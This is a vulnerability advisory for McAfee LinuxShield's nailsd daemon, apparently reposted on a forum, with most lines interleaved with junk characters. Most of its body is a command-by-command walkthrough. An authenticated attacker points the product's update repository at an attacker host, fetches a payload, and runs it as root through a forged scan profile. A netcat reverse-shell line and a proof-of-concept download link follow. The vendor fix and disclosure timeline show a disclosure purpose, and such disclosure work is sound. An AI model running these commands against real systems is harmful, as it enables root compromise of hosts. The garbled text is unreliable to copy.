    , L6 u, s1 Z! X! z1 Y4 ^9 E4 |) s: Z; \network, incorporating as many protective measures as possible.) \6 |/ A8 W! V. G
    & I% |$ Y0 ]+ X, n( w$ m
    LinuxShield uses a web-browser interface, and a large number of" H+ j4 I# V* @2 ]( i1 F* c) G
    LinuxShield installations can be centrally controlled by ePolicy
    9 \7 K$ i) T) w, d: F! ]4 xOrchestrator.! p# i4 n& {+ a+ V

    ; {# C/ i" n7 ](Product description from LinuxShield Product Guide)! Q& n! C7 v, w! a
    2 W2 U9 ]6 R0 ~/ C. \5 N9 V7 k# z- ^
    * Q4 b" H' c. w1 Z* W8 V* w" G4 ]& j
    6 y  a" ^. Q7 I3 D0 r
    Description:
    , |6 v- `4 {" }+ }  L) {7 Y============
    0 K3 z0 N  r4 s2 _/ i* j+ f# e% f3 Y5 C" R8 n5 B" Q
    This vulnerability allows remote attackers to execute arbitrary code9 C. i  A% y; f2 s
    on vulnerable installations of McAfee LinuxShield. User interaction
    / f+ k1 G" Q) F1 Mis not required to exploit this vulnerability but an attacker must
    ' C  {, z/ y  e" S0 ?- J; bbe authenticated.3 _+ d7 Q3 H3 g; v7 O0 l
    7 c, b/ ~' b$ ]1 {  r+ I( [
    The LinuxShield Webinterface communicates with the localy installed! @' _4 p' Q5 j7 a2 B+ B
    "nailsd" daemon, which listens on port 65443/tcp, to do
    6 [5 ]; U" c, x+ G' M  @8 X' o! Iconfiguration
    * @+ r) E3 U5 `8 @changes, query the configuration and execute tasks.$ q- Q) M' I& l8 Y

    4 F3 a' \! ^' g$ H( qEach user, which can login to the victim box, can also authenticate; f1 K8 u4 y/ x7 f1 c8 A
    it self to the "nailsd" and can do configuration changes and# V% ^" l6 m2 ?5 l6 I
    execute
    0 A( `" a% J& ?0 I8 J2 |tasks with root privileges.( I4 [, W) t! |+ @

    & [! \  }* i( v" S6 q$ IA direct execution of commands is not possible, but it is possible to
    * T) ^* F( {! Q6 Q) K9 c& t5 Ldownload and execute code through manipulation of the config and! L- ?& y2 b9 v8 A! N
    execute schedule tasks of the LinuxShield.& F, X8 z7 v! p& L5 Y
    ; U" I$ ?# x4 G
    ( g) Q7 m3 l5 o8 }7 ?0 \* m
    walk-through (after the TLS handshake):8 H. c3 c' M& M" x' H
    +--------------------------------------9 w  u6 R9 }2 A8 R

      p$ ]6 O5 W7 c# `- ^  @, m( }. Onailsd > +OK welcome to the NAILS Statistics Service1 t. a& Y, ?  G" i$ E# d% ?
    attacker> auth <user> <pass>5 F. }% N  |( O/ U
    nailsd > +OK successful authentication5 F# w! r* b; T
      O  G" r3 l! O& T
    # Set the Attacker repository to download our code from a httpd" k; q- Q9 d# [) Y
    # (catalog.z)
    8 t6 s( l  {2 u5 ]  H#---------------------------------------------------------------# Q5 k+ Y: c' E* f& `$ A
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    8 M# S/ T" l$ F: a- U* {! k+ `="1.0" encoding="UTF-8"?><ns:SiteLists$ _, w- e) D0 [
    xmlns:ns="naSiteLi
    ' b/ p! H2 I. Y: i5 i( Q+ @st" GlobalVersion="20030131003110"# p: }/ [5 V% B
    LocalVersion="20091209
    3 G4 F; s8 m% y5 ]161903" Type="Client"><SiteList
    $ ~( W) r8 b8 V- U) E( j% yDefault="1" Name="SomeGU
    ; _1 p$ a4 ^+ H% \ID"><HttpSite Type="repository"
    ( m8 C0 _% R7 M4 k1 P7 _  m1 Q, KName="EvilRepo" Order="1, M1 {7 a5 X1 p' P- {; l; g
    " Server="<attackerhost>:80"
    7 A5 h( d$ {+ w5 e" ~6 f  v0 H! qEnabled="1" Local="1"><Rela- j' i& k/ m9 J9 T7 o* G9 F
    1 q1 K2 L8 V# O$ ?8 l
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use% v+ v  Q: a+ P& J- R, t4 m
    rName></" \+ c2 Y8 W0 ]' e2 b, O% ?
    UserName><Password9 s% y7 p& n/ H/ J$ `, X: ^* R
    Encrypted="0"/></HttpSite></SiteList></: W( @  Y( q- ]9 s6 {
    ns:SiteLists> _cmd=update7 l6 {  y; d" i; l$ F
    nailsd > +OK database changes buffered.5 K& ~+ u2 B  w. u# s$ q. p
    6 u+ Y9 d" P, i/ I9 J$ J
    # Execute task to set the attacker repository
    ) b9 K" g4 E0 K! O#---------------------------------------------------------------
    # L. p2 \+ G! O% l" Q3 pattacker> task setsitelist
    ; t) f* X# E$ }4 x& k3 ~6 e3 X4 l9 xnailsd > +OK setting sitelist from CMA.( w: l7 j! i2 g$ p" b2 q
    - H3 }# h' A2 L+ e  |) \8 b  F/ Y+ w0 L; u
    # Execute the default Update task to download the code
    1 \8 Y6 O. q$ _1 g( p4 [#---------------------------------------------------------------! M5 b, _8 s* Q, h5 w- P* R
    attacker> task nstart LinuxShield Update
    ( @1 w1 O( t3 ?8 r% L) U( Ynailsd > +OK task LinuxShield Update starting
    & ^$ s2 `0 H4 d! r% D1 D( x) d, Y
    7 L4 N& _/ z  v9 C# Create a Scan profile, which executes our code. The profiles are
    ' w. }, C' b- k$ t3 p* c1 `4 `% P# not stored in the database.
    " O! d" C8 @, @/ u# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg/ a/ T, u* N, `( C- C
    #---------------------------------------------------------------
    $ Z/ ^. i1 p4 }% Q5 ~" E9 \attacker> sconf ODS_99 begin1 l+ N" W* A9 Z0 Y. B/ w6 ^
    nailsd > +OK 1260400888
    3 Z7 |* i. N* `: B. U. r& K5 Q4 C0 C& {3 L' [& O
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    " Q, ?3 s) O/ ppath. D3 Z% n) f: |2 f4 Q
    # where our earlier downloaded catalog.z file is stored.
    & J5 F8 i& N* T' M4 `% K1 v# (/opt/McAfee/cma/scratch/update/catalog.z)( E8 Q# v' Z1 K! K
    #---------------------------------------------------------------
    " F9 F* h. a" M7 K2 H& E, H: wattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=+ t* c$ y1 H: [
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O+ U; T' \2 w2 G- K5 f6 x
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    7 @8 v2 H0 i( g, o7 p& q) s10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    6 S' \  \! t+ l! v9 Hine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    + i, c7 J& A+ S4 O2 ?file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD* C- y3 R1 j- ~* j
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en# d& R: V) e! r% [; ?
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd1 |2 a0 E$ x7 W& B( N5 _
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu, l' Z' U" E& l& R1 G8 h
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru' [2 |% }6 E0 j* w0 Z( F
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99* T  J' P( R$ N; x. [9 L
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi( I( I. F# ~2 ?9 q
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    * a+ S/ C9 i6 Q0 Q; Udren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin; l5 B" z" E) H  s  k% G
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr  U" i& j+ |& R/ [5 u8 n5 y7 T. P% m
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm% g) S  u' ^9 l6 ]
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile% c$ q8 c  f* Y5 x% j; @6 H3 z
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    1 q( l; G; t9 I- V( r0 r! Zrue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat& r, g- R3 x' a+ v
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    6 D( Z7 ^; k1 i& J* M00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.* _/ h9 p/ G1 u& r" Z
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    7 {$ Y9 q, ~7 Q2 M  J( x5 s  F2 \6 xter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    3 }3 c: L6 R& u; ?: W- ~nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr9 y, `3 g4 B+ @1 s3 _
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil8 x, \5 _0 Z9 _) R" t
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    4 T9 ^6 K' e# L- Q- M+ K.action.Default.secondary=Quarantine nailsd.profile.ODS_99.9 N. G. j+ z3 L+ G4 q
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s2 \- ^/ F3 L( M8 x
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa& [6 J. O* f! R
    ss nailsd.profile.ODS_99.action.error=Block
    6 W5 Z; b, X; D2 e' E. Qnailsd > +OK configuration changes buffered
    # u& e# E! q- }& rattacker> sconf ODS_99 commit 1260400888
    4 w8 ]9 v8 }/ u/ y* U7 ~3 m4 Onailsd > +OK configuration changes stored
    ; |8 D: \8 w# g) r( Q2 a) V  U- {1 H. B" B, h  t/ r0 W9 z: q
    # Set a scan task with the manipulated profile to execute the code
    ( T9 y1 B/ F0 {' ~1 X#---------------------------------------------------------------
    & _8 d5 Q7 c# i/ T% f$ Aattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    ; V7 ?) k7 b3 k* i/ lpe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t( `) A" y' {6 T* T7 x
    mp;exclude:false timetable=type=unscheduled taskResults=0 i4 S" B$ g$ u' {% u3 Y
    _lastRun=1260318482 status=Stopped _cmd=insert+ d* h" ]% l9 b1 e$ A
    nailsd > +OK database changes buffered
    / u9 v+ t( C  n$ V. R' K: ]" k) H+ y0 z& I6 x
    # Execute scan task to execute the code
    1 T$ [: s; X9 o" _- I+ _  Y9 a#---------------------------------------------------------------
    ! ]: }$ ]. m( ]/ }& Q# j1 fattacker> task nstart Evil Task
    6 A1 J% c8 ?& R- \
    + W8 u5 O$ d6 `! X# H4 d, v+-------------------------------------- walk-through EOF
    1 t" P( d, M3 H
    : |* m- x, e8 Z" x- Z) F' [
    6 }% J! d: E! `4 r2 j" D- w4 ?To get a reverse root shell place something like this in the catalog.z
    3 R2 r7 }  m4 {. p, P( n! u  L
    * x; z2 W5 X( j1 \2 c& ]2 J; W" s--- snip ---
    & U: S7 h7 z3 ?#!/bin/sh
    - H3 Q( ^' w& j7 Inc -nv <attacker_host> 4444 -e /bin/sh7 e& w7 a. C0 Q9 I+ W
    --- /snip ---% R& K7 i; A! r3 p

    & t$ t# i' v. {
    , g4 ]8 ^- m' O# l$ Q
    5 ^/ [& k, [2 M% P3 P9 TProof of Concept :0 H" S4 Q; [8 ~9 Q# }$ ^5 y+ ~. Z
    ==================+ @9 k- o7 ^. j5 T5 [
    8 P9 M. t1 o, m0 y$ [6 K) b
    http://inj3ct0r.com/sploits/11165.tar.gz
    ! y1 f+ \4 ^1 X: ]8 i; Z1 K$ \2 l3 B/ ], Z, _* Q& I
    6 S5 Q  ?; C& \: a& C6 X4 w
    $ g" Z) F: z2 f( `- F+ D' @
    Solution:9 v. r5 T; z- P; M3 Q& R
    =========( |0 p+ J! U' v

    : T' I# R% x) g2 |/ EMcAfee Advisory; Y2 R& T; e* R& N1 \
    +--------------
    8 z/ i0 Z  N# ehttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    3 S+ e1 z$ M0 g/ I% Z1 N! [$ M* e- v0 `5 L- {$ U4 |) Z
    & z0 w$ k1 j8 m( n( H5 J% \# A. s
    2 T' B& w) `- Q8 w
    Disclosure Timeline (YYYY/MM/DD):, N8 h3 q) R; y' [! |- c2 l
    =================================
    + S7 ?1 _9 N2 {4 c  `4 ~- g$ m; Y4 J# v9 A; H+ |
    2009.12.07: Vulnerability found6 u$ P1 f) n+ L2 ]
    2010.02.03: Asked vendor for a PGP key
    * l' o- l9 C. g* R  T2010.02.05: Vendor sent his PGP key6 ?6 Z9 t% V, ?7 n- e9 T5 d
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure! R0 Q3 U* F9 ~6 x* U7 ?; }  ]
    date (2010.02.18) to Vendor5 f% `- a# `9 O9 K; Q& ?
    2010.02.05: Vendor acknowledges the reception of the advisory
    & ]4 L' G) V8 _/ V1 k' T( v2010.02.16: Ask for a status update, because the planned release date is% Y) l. j. d$ S
    2010.02.18.
    - a" n) Y% m" B. S7 ?& M3 J$ Y2010.02.16: Vendor response that, they are currently working on a patch% X! C& K3 f+ N: X
    2010.02.17: Changed release date to 2010.02.25.
    4 R+ F4 j9 `2 W% e: N' W" S2010.02.22: Vendor gives a status update, that they are able to release
    8 a) ~  f+ y5 D8 |6 Tthe patch on 2010.02.25.
    + p4 U( O) \- D! n& c0 O2010.02.24: Ask for a list of affected products and the advisory url.
    1 S* q4 t1 j/ ~) c: `! L$ g. i& q2010.02.24: Vendor sends the list.
    ( n: g. |" w" x  x2 c2010.03.02: Release of this Advisory: W2 y; c1 T1 p! b
    ( v: l) m- N# g3 o4 y" W
    / k2 x: J3 P- E9 \6 Y+ Y
    5 _& t9 Q! }2 Z$ k8 H
    7 s% R; l+ F5 B& W) a. a; ^, @$ N

    / L4 L+ L( D$ ]( }+ Y5 A% V3 m0 e
    ! U5 @# v' z" @$ z" @5 Z6 Y8 u; \& l' D4 c& Z

    % q+ Y2 p4 w5 s; W# v5 Y! }+ D; t' G( r  L' j
    * l: z, j) C& l0 w+ i
    " t0 i: k/ g. K
    # L. ^5 B' D! Q3 j; d% V& D

    6 n/ A9 ~; ?) o$ L2 ^& k' t. V* c9 T. _
    % j9 V) }4 V4 ~' U& Z

    ( A. Y" \4 }" }# w: ]" A4 k
    & V8 Z) k; W% r" O7 j/ M4 y
    ! Q; L, f2 m; d* s0 F. _
    + `: J; n: |. y" _6 L- m  m) ?
    . u1 h2 P& q1 t7 T0 P  ]$ o& ]" _4 A9 q9 z  {/ K2 d: q! k
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表